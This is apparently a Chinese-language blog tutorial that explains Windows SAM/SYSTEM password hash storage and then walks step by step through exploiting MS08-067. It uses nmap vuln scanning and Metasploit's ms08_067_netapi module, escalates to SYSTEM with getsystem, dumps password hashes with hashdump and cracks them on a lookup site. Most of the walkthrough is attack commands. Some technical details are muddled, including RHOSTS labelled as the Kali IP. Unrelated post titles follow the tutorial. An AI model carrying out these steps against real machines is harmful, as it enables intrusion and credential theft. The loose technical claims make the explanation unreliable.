一.windows密码与哈希

1.我们用于登录的windows密码,在windows系统中会进行加密。一般密码加密文件储存在c盘的windows\system32\config目录下,文件名是SAM文件。在system目录下有两个非常重要的文件
A.SAM文件:储存着windows密码,使用LM或者NT算法加密成明文哈希,再由syskey加密成乱码的二次密文
B.SYSTEM文件:密钥文件,有一个程序syskey,对上面的SAM文件进行第一次的解密,解密成明文的哈希值

我们使用反编译技术就可以获得密码

二.实战(利用ms08-067)

1.使用nmap扫描目标靶机(靶机ip)

nmap --script=vuln 192.168.1.183

发现目标存在ms08-067漏洞

2.启动渗透利用框架

metasploit

3.搜索该漏洞

search ms08-067

4.使用攻击模块

use exploit/windows/smb/ms08_067_netapi

5.显示要设置的参数

show options

6.设置参数(kali ip)

set RHOSTS 192.168.1.176

7.执行

run

8.查看权限

getuid

如管显示是SYSTEM就可以,否则输入getsystem直到显示SYSTEM

9.下载目标一次解密的密码

hashdump

复制密文

10.cmd5网站解密
www.cmd5.com

windows密码破解(哈希破解技术)相关推荐

  1. 用c++编写破解Windows密码程序

    用c++编写破解Windows密码程序(缺点只能破解当前电脑的密码) .cpp文件 #include "CrackWinPassword.h" #pragma warning(di ...

  2. 五种windows密码设置及破解(转)

    在使用电脑的过程中,难免要与各类密码打交道,以下九种密码可能是大家用的最多的:BIOS密码.安装密码.用户密码.电源管理密码.屏保密码.开机密码.上网密码.分级审查密码和共享密码.今天,我们就谈谈这些 ...

  3. 使用Rainbow tables和Ophcrack的组合工具破解Windows密码

    本文为寻找人生的起点 (http://blog.cn-ic.org)原创,如需转载,请注明出处,并保留原文链接 . 从前面的两篇文章(得到WindowsXP管理员权限的有效方法 ,John/bkhiv ...

  4. free rainbow 分布式破解 WINDOWS 密码的最好选择!

    我们虽然可以通过Rainbow Table与Ophcrack的组合以更加快速的方式暴力破解Windows密码.但是对于个人,下载或者自己制作几G,甚至几十G的Rainbow Table,结果只破解一. ...

  5. 手工破解windows密码

    [CMD之魅力:常用命令]  net user:查看所有用户.  net user 用户名:查看指定用户的信息.  net localgroup administrators:查看管理员组的用户信息. ...

  6. python获取WiFi列表,根据密码本穷举破解,Windows

    python获取WiFi列表,根据密码本穷举破解,Windows 后附密码本 结果还是看运气 不要过度以及违法使用 单次连接时间自由调整:我自己测试时1秒够了 #wifi连接时间 time.sleep ...

  7. 如何破解密码的哈希值,破解双MD5密码值

    这是关于我如何破解密码的哈希值1亿2200万* John the Ripper和oclHashcat-plus故事. 这是几个月前,当我看到一条推特:从korelogic约含共1亿4600万个密码的密 ...

  8. 彩虹表-破解哈希算法

    彩虹表(Rainbow Table)是一种破解哈希算法的技术,它的性能非常让人震惊,在一台普通PC上辅以NVidia CUDA技术,对于NTLM算法可以达到最高每秒103,820,000,000次明文 ...

  9. 她破解哈希函数算法:坚持10年做一件事一定能做成

    今年9月7日,2019未来科学大奖揭晓,这项设立4年的大奖迎来首位女性得主--密码学家王小云.在信息时代,金融服务.网络安全等背后都离不开密码系统的"护航".在大众眼中,密码带着神 ...

最新文章

  1. 带你走进Kaggle Kernels(内附视频讲解)
  2. 使用 Java 配置进行 Spring bean 管理--转
  3. 支付宝不止怀有“社交梦”,社区金融才是它的野心所在
  4. J2ME下访问.net的webservice
  5. mysql统计各部门人数_2019年内蒙古普通高校招生考试各分数段人数统计表公布
  6. 【免费活动】字节跳动背后的音视频技术揭秘
  7. linux组类型,LINUX用户以及用户组
  8. C++的reinterpret_cast
  9. zzzkkk666用户名密码
  10. 第二次作业:分布式版本控制系统Git的安装与使用
  11. sd卡卡槽_SD卡无法读取最完整解决办法汇总
  12. C#list转JSON(Newtonsoft.Json.dll)(仅做记录)
  13. 【每天学点心理学第七期】人性定理:人都是以服务于他自己为目的的!
  14. Ural 2037. Richness of binary words 打表找规律 构造
  15. 【Python】只需2行代码,轻松将PDF转换成Word(含示范案例)
  16. 【渝粤教育】国家开放大学2018年秋季 2745T农村经济管理 参考试题
  17. .net5 开启Lucene的全文搜索之旅
  18. 【BZOJ2152】聪聪可可 树分治
  19. 【Android 系统】--- 下载 Android源码
  20. pes时处理PTS和DTS的方法

热门文章

  1. lyle的第一篇博客
  2. 规格中的OR\DR\DS\RR\IR\PB\SF\SR\AR\CR
  3. 聚合查询越来越慢?——详解Elasticsearch的Global Ordinals与High Cardinality
  4. 谷歌Fuchsia操作系统对编程语言的支持决议
  5. 【水滴石穿】ES must与should组合使用的正确方式
  6. 小程序开发常见错误及排除方法
  7. java实现销售预测算法,预测5天销售
  8. 加拿大程序员趣闻系列 1_N,kotlin循环
  9. python函数中的变量取出来_在Python中从函数调用中提取变量
  10. 《博弈论》异或 博弈x^x第二手只能一定赢吗?